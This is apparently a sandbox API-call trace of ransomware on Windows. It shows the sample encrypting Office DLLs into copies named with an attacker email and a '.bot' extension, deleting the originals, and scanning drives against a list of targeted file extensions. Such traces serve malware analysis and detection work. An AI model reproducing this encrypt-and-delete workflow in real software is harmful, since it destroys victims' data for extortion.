	[0058.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.621] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.621] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0058.621] GetLastError () returned 0x0
	[0058.621] ReadFile (in: hFile=0x230, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xd9c0, lpOverlapped=0x0) returned 1
	[0058.624] WriteFile (in: hFile=0x228, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xd9d0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xd9d0, lpOverlapped=0x0) returned 1
	[0058.625] ReadFile (in: hFile=0x230, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.625] WriteFile (in: hFile=0x228, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0058.625] SetEndOfFile (hFile=0x228) returned 1
	[0058.625] CloseHandle (hObject=0x228) returned 1
	[0058.625] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.626] SetEndOfFile (hFile=0x230) returned 1
	[0058.627] CloseHandle (hObject=0x230) returned 1
	[0058.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.627] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll")) returned 1
	[0058.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.627] lstrlenW (lpString=".doc") returned 4
	[0058.627] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.627] lstrlenW (lpString=".docx") returned 5
	[0058.627] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0058.627] lstrlenW (lpString=".pdf") returned 4
	[0058.627] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.627] lstrlenW (lpString=".xls") returned 4
	[0058.627] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.627] lstrlenW (lpString=".xlsx") returned 5
	[0058.627] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0058.627] lstrlenW (lpString=".ppt") returned 4
	[0058.627] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.627] lstrlenW (lpString=".zip") returned 4
	[0058.627] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.627] lstrlenW (lpString=".rar") returned 4
	[0058.628] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString=".bz2") returned 4
	[0058.628] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.628] lstrlenW (lpString=".7z") returned 3
	[0058.628] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.628] lstrlenW (lpString=".dbf") returned 4
	[0058.628] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.628] lstrlenW (lpString=".1cd") returned 4
	[0058.628] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.628] lstrlenW (lpString=".jpg") returned 4
	[0058.628] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.628] lstrlenW (lpString=".doc") returned 4
	[0058.628] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString=".docx") returned 5
	[0058.628] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0058.628] lstrlenW (lpString=".pdf") returned 4
	[0058.628] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString=".xls") returned 4
	[0058.628] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString=".xlsx") returned 5
	[0058.628] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0058.628] lstrlenW (lpString=".ppt") returned 4
	[0058.628] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.628] lstrlenW (lpString=".zip") returned 4
	[0058.628] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString=".rar") returned 4
	[0058.628] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.628] lstrlenW (lpString=".bz2") returned 4
	[0058.628] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.629] lstrlenW (lpString=".7z") returned 3
	[0058.629] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.629] lstrlenW (lpString=".dbf") returned 4
	[0058.629] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.629] lstrlenW (lpString=".1cd") returned 4
	[0058.629] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.629] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 67
	[0058.629] lstrlenW (lpString=".jpg") returned 4
	[0058.629] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.629] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.629] lstrlenW (lpString="ACEREP.DLL") returned 10
	[0058.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.629] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=691616) returned 1
	[0058.629] CloseHandle (hObject=0x230) returned 1
	[0058.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll")) returned 0x20
	[0058.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0058.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.630] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.630] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0058.630] GetLastError () returned 0x0
	[0058.630] ReadFile (in: hFile=0x230, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xa8da0, lpOverlapped=0x0) returned 1
	[0058.644] WriteFile (in: hFile=0x228, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xa8db0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xa8db0, lpOverlapped=0x0) returned 1
	[0058.922] ReadFile (in: hFile=0x230, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.922] WriteFile (in: hFile=0x228, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0058.922] SetEndOfFile (hFile=0x228) returned 1
	[0059.068] CloseHandle (hObject=0x228) returned 1
	[0059.068] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.068] SetEndOfFile (hFile=0x230) returned 1
	[0059.074] CloseHandle (hObject=0x230) returned 1
	[0059.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.074] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll")) returned 1
	[0059.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.204] lstrlenW (lpString=".doc") returned 4
	[0059.204] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0059.204] lstrlenW (lpString=".docx") returned 5
	[0059.204] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0059.204] lstrlenW (lpString=".pdf") returned 4
	[0059.204] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0059.204] lstrlenW (lpString=".xls") returned 4
	[0059.204] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0059.204] lstrlenW (lpString=".xlsx") returned 5
	[0059.204] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0059.204] lstrlenW (lpString=".ppt") returned 4
	[0059.204] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0059.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.204] lstrlenW (lpString=".zip") returned 4
	[0059.204] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0059.204] lstrlenW (lpString=".rar") returned 4
	[0059.204] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0059.204] lstrlenW (lpString=".bz2") returned 4
	[0059.204] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0059.204] lstrlenW (lpString=".7z") returned 3
	[0059.204] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0059.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.204] lstrlenW (lpString=".dbf") returned 4
	[0059.204] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0059.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.204] lstrlenW (lpString=".1cd") returned 4
	[0059.204] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0059.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.204] lstrlenW (lpString=".jpg") returned 4
	[0059.204] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0059.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.205] lstrlenW (lpString=".doc") returned 4
	[0059.205] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0059.205] lstrlenW (lpString=".docx") returned 5
	[0059.205] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0059.205] lstrlenW (lpString=".pdf") returned 4
	[0059.205] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0059.205] lstrlenW (lpString=".xls") returned 4
	[0059.205] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0059.205] lstrlenW (lpString=".xlsx") returned 5
	[0059.205] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0059.205] lstrlenW (lpString=".ppt") returned 4
	[0059.205] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0059.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.205] lstrlenW (lpString=".zip") returned 4
	[0059.205] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0059.205] lstrlenW (lpString=".rar") returned 4
	[0059.205] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0059.205] lstrlenW (lpString=".bz2") returned 4
	[0059.205] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0059.205] lstrlenW (lpString=".7z") returned 3
	[0059.205] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0059.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.205] lstrlenW (lpString=".dbf") returned 4
	[0059.205] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0059.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.205] lstrlenW (lpString=".1cd") returned 4
	[0059.205] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0059.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66
	[0059.205] lstrlenW (lpString=".jpg") returned 4
	[0059.205] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0059.206] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0059.206] lstrlenW (lpString="Csi.dll") returned 7
	[0059.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 18
	os_tid = 0x99c

	[0032.825] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xac508d8
	[0032.825] lstrlenW (lpString="C:") returned 2
	[0032.825] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xa91fd00 | out: lpFindFileData=0xa91fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7e5ba40
	[0032.826] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0032.826] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1
	[0032.826] lstrlenW (lpString="$Recycle.Bin") returned 12
	[0032.826] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1
	[0032.826] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb3e0048
	[0032.827] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0032.827] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb3f0050
	[0032.827] FindNextFileW (in: hFindFile=0xb3f0050, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.827] FindNextFileW (in: hFindFile=0xb3f0050, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1
	[0032.827] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0032.827] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1
	[0032.827] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46
	[0032.827] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1
	[0032.827] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb3f1098
	[0032.828] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0032.828] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb4010a0
	[0032.828] FindNextFileW (in: hFindFile=0xb4010a0, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.828] FindNextFileW (in: hFindFile=0xb4010a0, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0032.828] lstrlenW (lpString="desktop.ini") returned 11
	[0032.828] lstrlenW (lpString=".1cd") returned 4
	[0032.828] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0032.828] lstrlenW (lpString=".3ds") returned 4
	[0032.828] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1
	[0032.828] lstrlenW (lpString=".3fr") returned 4
	[0032.828] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1
	[0032.828] lstrlenW (lpString=".3g2") returned 4
	[0032.829] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1
	[0032.829] lstrlenW (lpString=".3gp") returned 4
	[0032.829] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1
	[0032.829] lstrlenW (lpString=".7z") returned 3
	[0032.829] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0032.829] lstrlenW (lpString=".accda") returned 6
	[0032.829] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1
	[0032.829] lstrlenW (lpString=".accdb") returned 6
	[0032.829] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1
	[0032.829] lstrlenW (lpString=".accdc") returned 6
	[0032.829] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1
	[0032.829] lstrlenW (lpString=".accde") returned 6
	[0032.829] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1
	[0032.829] lstrlenW (lpString=".accdt") returned 6
	[0032.829] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1
	[0032.829] lstrlenW (lpString=".accdw") returned 6
	[0032.829] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1
	[0032.829] lstrlenW (lpString=".adb") returned 4
	[0032.829] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1
	[0032.829] lstrlenW (lpString=".adp") returned 4
	[0032.829] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1
	[0032.829] lstrlenW (lpString=".ai") returned 3
	[0032.830] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1
	[0032.830] lstrlenW (lpString=".ai3") returned 4
	[0032.830] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".ai4") returned 4
	[0032.830] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".ai5") returned 4
	[0032.830] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".ai6") returned 4
	[0032.830] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".ai7") returned 4
	[0032.830] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".ai8") returned 4
	[0032.830] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".anim") returned 5
	[0032.830] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1
	[0032.830] lstrlenW (lpString=".arw") returned 4
	[0032.830] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".as") returned 3
	[0032.830] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1
	[0032.830] lstrlenW (lpString=".asa") returned 4
	[0032.830] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".asc") returned 4
	[0032.830] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".ascx") returned 5
	[0032.830] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1
	[0032.830] lstrlenW (lpString=".asm") returned 4
	[0032.830] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".asmx") returned 5
	[0032.830] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1
	[0032.830] lstrlenW (lpString=".asp") returned 4
	[0032.830] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1
	[0032.830] lstrlenW (lpString=".aspx") returned 5
	[0032.830] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1
	[0032.830] lstrlenW (lpString=".asr") returned 4
	[0032.831] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".asx") returned 4
	[0032.831] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1
	[0032.831] lstrlenW (lpString=".avi") returned 4
